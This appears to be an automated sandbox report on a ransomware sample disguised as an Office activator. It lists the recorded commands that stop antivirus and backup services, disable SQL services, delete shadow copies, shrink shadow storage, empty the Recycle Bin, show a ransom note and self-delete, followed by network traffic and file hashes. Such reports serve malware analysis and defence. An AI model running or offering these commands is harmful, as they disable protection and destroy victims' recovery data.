C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 41.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.144.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.127.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 15.125.203.66.in-addr.arpa | udp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gfs440n014.userstorage.mega.co.nz | udp |
| JP | 103.99.35.14:443 | gfs440n014.userstorage.mega.co.nz | tcp |
| JP | 103.99.35.14:443 | gfs440n014.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 14.35.99.103.in-addr.arpa | udp |
| GB | 92.123.128.189:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 189.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tip.neiki.dev | udp |
| US | 172.67.70.37:80 | tip.neiki.dev | tcp |
| US | 172.67.70.37:80 | tip.neiki.dev | tcp |
| US | 172.67.70.37:443 | tip.neiki.dev | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | tipstatus.statuspage.io | udp |
| DE | 108.157.4.73:443 | tipstatus.statuspage.io | tcp |
| US | 8.8.8.8:53 | crt.rootg2.amazontrust.com | udp |
| DE | 18.154.63.32:80 | crt.rootg2.amazontrust.com | tcp |
| US | 8.8.8.8:53 | q72g5l27zzgc.statuspage.io | udp |
| US | 8.8.8.8:53 | 37.70.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.4.157.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.63.154.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.4.157.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.iconify.design | udp |
| US | 104.26.13.204:443 | api.iconify.design | tcp |
| US | 104.26.13.204:443 | api.iconify.design | tcp |
| US | 104.26.13.204:443 | api.iconify.design | tcp |
| US | 104.26.13.204:443 | api.iconify.design | tcp |
| US | 104.26.13.204:443 | api.iconify.design | tcp |
| US | 104.26.13.204:443 | api.iconify.design | tcp |
| US | 8.8.8.8:53 | 204.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.neiki.dev | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.poweradmin.com | udp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.55.1.52.in-addr.arpa | udp |
| N/A | 10.127.255.255:3 | udp | |
| US | 8.8.8.8:53 | cutewallpaper.org | udp |
| US | 104.21.37.179:443 | cutewallpaper.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 255.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.37.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| N/A | 10.127.0.255:3 | udp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 104.21.37.179:443 | cutewallpaper.org | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 104.21.37.179:443 | cutewallpaper.org | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ba6ef346187b40694d493da98d5da979 |
| SHA1 | 643c15bec043f8673943885199bb06cd1652ee37 |
| SHA256 | d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73 |
| SHA512 | 2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | b8880802fc2bb880a7a869faa01315b0 |
| SHA1 | 51d1a3fa2c272f094515675d82150bfce08ee8d3 |
| SHA256 | 467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812 |
| SHA512 | e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2 |
\??\pipe\LOCAL\crashpad_4640_DPOTZRBQDYUULRHE
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 90ac735ccc112728c59b29485fcb6ac7 |
| SHA1 | dca6a4dd6ce8582db4436fd745668634366e17fe |
| SHA256 | c46a60bb1d43de86df733ff92745a6b3fac1d40bd88eda2f4eefc95cb35990bc |
| SHA512 | 15b86623d35a19daf855a5680d496dd631e3ff8a302b43d092423dbe077880247568d22c051efa19a55c50367b335ccfcf3d8e3f01325cc3d2d4b47037a81f01 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 95596a28a2c122816f4b90f1134c90f9 |
| SHA1 | 70a739ea3f46a79ca4f8f8a2e05d7e99fb29d158 |
| SHA256 | 4e79c22a4db661db5bb91845d24fe777ab56e59a37dcefe0e97213bcfcc40065 |
| SHA512 | ca6ab71bb88ec101c3042bf4e3f415870570175e9e876042a343a39ef61ba9413d76d099abb6cbbc728412ef8e2b99dcf0bede86e5a92cc63d48f03a0986eabe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e043448fe7cf84d6152554dfdd644fc6 |
| SHA1 | b63959fa66fd945143f175ea6457159dd78351b8 |
| SHA256 | 1c43d4f3ef5896156ff9455398bd902a5509b8b52bbcef3b8bf7d62b8b39042c |
| SHA512 | a6c42678c7f48b05f7c3d78b9aa5fde7347f1455ae215563af837483d5665d84469e85def182db3d6e0960e4c8fb363f4cc3927a2fdfca18b26e17e5d187974f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 282b1aa412b294f1068c5d649063cf08 |
| SHA1 | 62ef016c6d02db2f9c873ac9f94afe4e5b6ec73d |
| SHA256 | 7ac2edce91a202a936481d7c71729c682bbdcfbd21f7d16da05a90db24bbb9de |
| SHA512 | be53d21343b6ad1145dd98cd0ceaf92355be3bb7a81fe95abe5864e6aae3231acb8263a6d2548c169bacfc56ec2b1cae1b9f522076ea48f8e15362caecb08cf3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 5a55984a566a8b8279b4efbf1b1f3849 |
| SHA1 | e7a188eee0a70453172fdcebb43a14735a97438a |
| SHA256 | f6bca04364595aa1b95fc152db50c2f58f72c8d336649a60fc1800a235c2f65e |
| SHA512 | ff59dce272d10b2f5a75b745cdd6a9a52a12a5ae87eb99134eddb4bf68405ba74466e3fbfc6a9bb52116ba8aa4a14beeae0691c3f6b375f2ff79889e609025e0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57ddcd.TMP
| MD5 | 07442de914ae8daa9f823ab79ee07c13 |
| SHA1 | 7cd2ce125e0a297ce2258d90c5ce8f29da578628 |
| SHA256 | c144087003433560daad9bd06e64d38b30b67fa95a01a41fc92c0a767ff3d8d3 |
| SHA512 | 3250fb0f246cfee83b5800b514a3057ccfe3b5ecd46e616e6c43a8d4391c615946ddcf1667bcdbf15ce349de73166c0046a101eaae01b73e3ee7c50c3ea82c96 |
